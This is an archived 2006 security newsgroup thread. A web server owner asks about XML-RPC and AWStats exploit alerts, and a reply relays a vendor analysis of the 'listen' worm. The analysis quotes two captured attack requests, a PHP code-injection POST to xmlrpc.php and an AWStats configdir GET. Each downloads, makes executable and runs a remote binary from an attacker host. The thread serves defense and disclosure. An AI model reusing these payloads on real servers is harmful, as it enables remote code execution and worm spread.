Re: XML RPC Exploit Attack
- From: "John Torrey" <John Torrey@xxxxxxxxxxxxxxxxxxxxxxxxx>
- Date: Thu, 26 Jan 2006 11:11:02 -0800
Joseph,
Did this remove the warning from you server about this exploit? We just
installed the TrendMicro security suite on our network and it rings my email
with these alerts all day long...how far so I take them? How far have you
scaled-back the extreme viral search warnings on the Trend product? Any
suggestions?
Please email me at jtorrey2charter.net..thanks!!!!
John Torrey (JT)
Information Services
"Joseph Bittman MVP MCSD" wrote:
> December 20, 2005
>
> Excellent! :-) Thank you! I don't use PHP or those programs, and therefore
> the RPC one isn't an issue. Also, I don't allow CGI scripts and I don't have
> a cgi-bin or awstats folder either. :-) Thanks again!
>
> --
>
> Joseph Bittman
> Microsoft Certified Solution Developer
> Microsoft Most Valuable Professional -- DPM
>
> Blog/Web Site: http://71.39.42.23/
>
>
>
> "David H. Lipman" <DLipman~nospam~@Verizon.Net> wrote in message
> news:eTJmrfbBGHA.2040@xxxxxxxxxxxxxxxxxxxxxxx
> > From: "Joseph Bittman MVP MCSD" <RyanBittman@xxxxxxx>
> >
> > | December 20, 2005
> > |
> > | Wow! The software is new to me and I didn't know it had other logs... I
> > | have found the event logs where it shows more information. I'm getting
> > hit
> > | by the XML_RPC_Exploit description a LOT. It is coming in on port 80
> > | (http -- this computer hosts a small personal web site which relies
> > heavily
> > | on XML stores)
> > |
> > | Basically, there are blocks of 10-20 exploit attempts in 1 minute
> > timespans,
> > | and then it switches source IPs and trys again about 5 hours later...
> > (it
> > | also switches SourcePort every attempt --so each block from an IP will
> > have
> > | about 10-20 different sourceports)
> > |
> > | IPs:
> > | 82.159.46.137
> > | 217.129.49.18 -- Also attempted some AWSTATS_CONFIGDIR_EXPLOIT attempts
> > | 203.172.162.242
> > | 61.145.142.189
> > | 209.152.181.152 - Also attempted some AWSTATS_CONFIGDIR_EXPLOIT attempts
> > | 221.228.241.222
> > |
> > | What do you think about this? It is blocking them every time, although I
> > | hate for my web server to get hit with this type of useless waste of CPU
> > | power (Yes, I'm worried too about DoS.).... Any ideas? -- Also, are
> > these
> > | IPs something which Trend Micro or someone else might be interested in
> > for a
> > | 'Banned/Suspect IP address list'? Thanks for your help!
> > |
> >
> > As promised, from my liaison at Trend Micro.
> >
> > -----------
> > * exploits awstats.pl vulnerability
> >
> > * exploits xmlrpc.php
> >
> >
> > From ISC:
> > "You can find the details of the vulnerability at:
> > http://www.gulftech.org/?node=research&article_id=00088-07022005
> > http://www.securityfocus.com/bid/14088/
> > http://secunia.com/advisories/15852/
> >
> > For a list of vulnerable applications, please refer to:
> > http://www.securityfocus.com/bid/14088/info
> > http://www.osvdb.org/17793
> >
> > If you are running a vulnerable version, you are advised to upgrade
> > immediately:
> > http://www.securityfocus.com/bid/14088/solution";
> >
> >
> > However, for the xmlrpc.php, instead of downloading the file 'cback' or
> > 'lupii', it now
> > downloads a file named 'listen'. Based on initial analysis, it seems to
> > have both the
> > functionalities of 'cback' and 'lupii':
> > * it can be run with an argument, which IMO, acts as a connect-back
> > program for the attacker
> > (same as cback - HKTL_CALLBACK.A)
> >
> > * it also has worm capabilities to propagate via awstats.pl or xml-rpc
> > exploits (same as
> > lupii - ELF_LUPPER.A) Possible ELF_LUPPER.B?
> >
> > POST requests to the following URL's:
> > * /xmlrpc/xmlrpc.php
> >
> > * /wordpress/xmlrpc.php
> >
> > * /phpgroupware/xmlrpc.php
> >
> > * /drupal/xmlrpc.php
> >
> > * /blogs/xmlsrv/xmlrpc.php
> >
> > * /blog/xmlsrv/xmlrpc.php
> >
> > * /blog/xmlrpc.php
> >
> >
> > This, of course attempts to exploits the XML-RPC vulnerability.
> >
> > It also sends a GET request to exploit the awstats.pl configdir
> > vulnerability and targets
> > the following URL's:
> > * /cgi-bin/
> >
> > * /cgi-bin/awstats/
> >
> > * /awstats/
> >
> >
> > The malware appends the exploit code at the end of these directories.
> > Sample captures of the
> > 2 attacks are as follows:
> >
> > XML-RPC
> > ==============================
> > POST /xmlrpc.php HTTP/1.1
> > Host: xxx.xxx.xxx.xxx
> > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
> > Content-Type: text/xml
> > Content-Length:269
> >
> > <?xml version="1.0"?>
> > <methodCall><methodName>test.method</methodName>
> > <params><param><value><name>',''));
> > echo '_begin_';echo `cd /tmp;wget 24.xxx.xxx.18/listen;chmod +x
> > listen;./listen `;
> > echo '_end_';exit;/*</name></value></param></params></methodCall>
> > ==============================
> >
> >
> >
> > AWSTATS.PL
> > ==============================
> > GET /awstats/awstats.pl?configdir=|echo;
> > echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3b
> > chmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;
> > echo| HTTP/1.1
> > Host: xxx.xxx.xxx.xxx
> > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
> > ==============================
> >
> >
> > -----------
> >
> > --
> > Dave
> > http://www.claymania.com/removal-trojan-adware.html
> > http://www.ik-cs.com/got-a-virus.htm
> >
> >
>
>
>
.
- Prev by Date: Re: News Group for MS Antispyware
- Next by Date: Re: Symantec Corporate trial
- Previous by thread: News Group for MS Antispyware
- Next by thread: Re: Symantec Corporate trial
- Index(es):
Relevant Pages
|
